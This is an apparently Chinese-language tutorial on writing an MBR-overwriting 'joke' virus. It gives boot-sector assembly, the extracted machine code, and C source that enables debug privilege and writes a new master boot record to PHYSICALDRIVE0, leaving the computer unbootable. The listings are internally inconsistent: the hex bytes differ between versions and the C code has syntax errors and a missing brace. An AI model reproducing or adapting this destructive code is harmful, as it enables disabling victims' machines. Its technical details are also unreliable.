一个改写MBR的例子

前言

想要对MBR类的病毒进行一下研究与学习，在此期间，看了很多资料，其中帮助最大的就是金龟子学姐和willj学长发表的文章。一个从源码与实现角度来讲了一下，另外一个从反病毒角度来分析。

 

功能描述

该样本就只是一个简单的玩笑病毒，主要是让你不能开机，只在屏幕显示一串字符串。

 

0x1 什么是MBR

    MBR，就是硬盘的主引导记录，也就是硬盘的0柱面、0磁头、1扇区称为主引导扇区。这类病毒是格式化硬盘之后任然存在的病毒。该记录占用512个字节，它用于硬盘启动时将系统控制权交给用户指定的。简而言之，就是先于操作系统拿到控制权

 

0x2 病毒原理

• 准备好将要写入的MBR
• 提升程序权限   调用CreateFile函数去打开物理驱动器的时候，必须具备调试权限，否则就会打开失败，打开失败我们就不能对MBR进行读取了

• 打开"\\\\.\\PHYSICALDRIVE0"文件  \\\\.\\PHYSICALDRIVE0"文件表示本机的物理驱动器0(一般是主硬盘)，也就是我们的MBR。
• 写入MBR

    成功写入MBR，我们也就拿到了先于系统的控制权了，就可以做很多事情了，但是这里我们只是在teletype模式下显示一串字符串。

0x3 汇编源码

下面是完整的汇编源码：

1. assume cs:code
2. code segment
3. start:
4. mov ax,12h ;使用12号功能，对显示器进行设置
5. int 10h
6. ;显示器的设置
7. mov bp, 7C18H ;字符串的起始偏移,为啥是7c18呢？代码得长度干好18H，哈哈
8. mov cx, 13h ;字符串长度
9. mov ax,1301h ;AH = 13h 调用功能号13 ,在teletype模式下显示字符串,AL = 01H
10. mov bx,0Ch ;BH = 00H BL = 0CH
11. mov dx,0h ;起始的行列
12. int 10h
13. jmp $ ;无线循环，防止代码进入数据区
14. code ends
15. end start

 

 

下面是对汇编代码的剖析:

• 对显示器进行设置

 int 10h中断是BIOS对系统屏幕显示器所提供的服务程序。我们可以调用int 10h中断来控制显示器的显示。使用INT 10H中断的时候，都先必须指定AH的值，AH的值是用来指定INT 10H将要调用的功能号。

1. mov ax,12h ;使用12号功能，对显示器进行设置
2. int 10h ;调用int 10h中断

• 指定显示字符串

1. mov bp, 7C18H ;字符串的起始偏移,为啥是7c18呢？代码得长度刚好18H，哈哈
2. mov cx, 13h ;字符串长度

• 对字符串显示进行设置

1. mov ax,1301h ;AH = 13h 调用功能号13 ,在teletype模式下显示字符串,AL = 01H
2. mov bx,0Ch ;BH = 00H BL = 0CH
3. mov dx,0h ;起始的行列

 

0x4 INT 10H中断的13号功能

功能描述：在Teletype模式下显示字符串

入口参数：AH＝13H
BH＝页码
BL＝属性,文字模式或颜色 (若AL=00H或 01H)
CX＝显示字符串长度
(DH、DL)＝坐标(行、列)
ES:BP＝显示字符串的地址 AL＝显示输出方式
0—— 字符串中只含显示字符，其显示属性在BL中。显示后，光标位置不变
1——字符串中只含显示字符，其显示属性在BL中。显示后，光标位置改变
2 ——字符串中含显示字符和显示属性。显示后，光标位置不变
3——字符串中含显示字符和显示属性。显示后，光标位置改变
出口参数：无

0x5 获取汇编的机器码

    上为什么要获取上面代码的机器码呢？因为我们的代码都是被编译器解释为机器码来执行的，这里我们面是汇编代码，所以需要编译链接之后可以将机器码拷贝出来。

编译连接：

• 用到的工具

• 用到的指令

将上面的解压后放到你觉得合适的地方，这里我是放在的C盘。这里编译是用到masm5.0里面的masm.exe程序。下面就对我们的代码进行编译。生成的*.obj文件存放在masm.exe程序的同位置，如果你想改变生成的位置，你可以在cmd显示Object filename [4.obj]的时候指定一个路径。

1. C:\masm>masm C:\Users\xiaopao\Desktop\4.asm

 

编译成功后就是连接了，连接我们要用到的就是masm5.0里面的link.exe程序。

 ok，程序连接成功，下面就是提取里面的机器码了。这里我用的是C32Asm，当然你也可以用WinHex

 

圈出来的部分就是我们的代码，下面是提取出来的。

B8 12 00 CD 10 BD 18 7C B9 13 00 B8 01 13 BB 0C 00 BA 00 00 CD 10 EB FE

 

我们把我们想要显示的字符串添加到后面去。

B8 12 00 CD 10 BD 18 7C B9 13 00 B8 01 13 BB 0C 00 BA 00 00 CD 10 E2 FE 06D 061 06B 065 020 062 079 20 78 69 61 6F 70 61 6F 00

 

0x6 主代码

MBR准备好了。那么就来写主程序吧。主程序就两个函数，一个用来提权，一个用来写MBR。直接贴代码吧

1. #include "stdafx.h"
2. #include <Windows.h>
3. #include <TlHelp32.h>
4. char temp[512]={
5. 0xB8,0x012,0x000,0x0CD,0x010,0x0BD,0x018,0x07C,0x0B9,0x00F,0x000,0x0B8,0x001,0x013,0x0BB,0x00C,
6. 0x000,0x0BA,0x000,0x000,0x0CD,0x010,0x0E8,0x0FE,0x06D,0x061,0x06B,0x065,0x020,0x062,0x079,0x020,
7. 0x078,0x069,0x061,0x06F,0x070,0x061,0x06F,0x000};
8. //自己写一个函数来提权。
9. void GetPrivileges()
10. {
11. //定义一个PLUID
12. HANDLE hProcess;
13. HANDLE hTokenHandle;
14. TOKEN_PRIVILEGES tp;
15. //获取当前进程的句柄
16. hProcess = GetCurrentProcess();
17. //
18. OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hTokenHandle);
19. //函数查看系统权限的特权值，返回信息到一个LUID结构体里。
20. tp.PrivilegeCount =1;
21. LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);
22. tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
23. AdjustTokenPrivileges(hTokenHandle,FALSE,&tp,sizeof(tp),NULL,NULL);
24. CloseHandle(hTokenHandle);
25. CloseHandle(hProcess);
26. }
27. //下面的函数来读取"\\\\.\\PHYSICALDRIVE0"
28. void ReadPHYSICALDRIVE0()
29. {
30. HANDLE hFile;
31. DWORD dwReadSize;
32. // char lpBuffer[512];
33. //使用createFile打开这个文件
34. char str_Name[] = "\\\\.\\PHYSICALDRIVE0";
35. hFile = CreateFile(str_Name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING , FILE_ATTRIBUTE_NORMAL ,0);
36. if (hFile == INVALID_HANDLE_VALUE)
37. {
38. MessageBox(0, "wrong", "wrong", 0);
39. }
40. BYTE pMBR[512] ={0}; ;MBR为512个字节
41. memcpy(pMBR,temp,sizeof(temp)-1);
42. pMBR[510] =0x55; ;最后的标记位
43. pMBR[511] = 0xAA;
44. //用readfile来读取文件
45. WriteFile(hFile, pMBR, 512, &dwReadSize, NULL);
46. }
47. int _tmain(int argc, _TCHAR* argv[])
48. {GetPrivileges();
49. ReadPHYSICALDRIVE0();
50. return 0;

0x7 总结

运行我们编译好的主程序，然后重启就会发现我们的电脑无法正常启动了，并且在屏幕上会出现一串字符。如下图到这里一个简单的改写MBR的程序就写好了。